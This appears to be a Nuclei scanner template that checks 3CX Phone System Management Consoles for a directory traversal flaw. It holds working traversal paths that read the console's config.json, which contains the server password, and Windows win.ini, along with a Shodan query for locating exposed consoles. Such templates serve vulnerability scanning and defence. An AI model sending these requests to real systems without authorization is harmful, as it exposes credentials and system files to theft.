id: 3cx-management-console

info:
  name: 3CX Management Console - Directory Traversal
  author: random-robbie
  severity: high
  description: Directory traversal vulnerability on 3CX Management Console.
  reference: https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
  metadata:
    shoda-query: http.title:"3CX Phone System Management Console"
  tags: 3cx,lfi,voip

requests:
  - method: GET
    path:
      - '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json'
      - '{{BaseURL}}/Electron/download/windows/\windows\win.ini'

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "CfgServerPassword"
          - "CfgServerAppName"
        condition: and

      - type: word
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and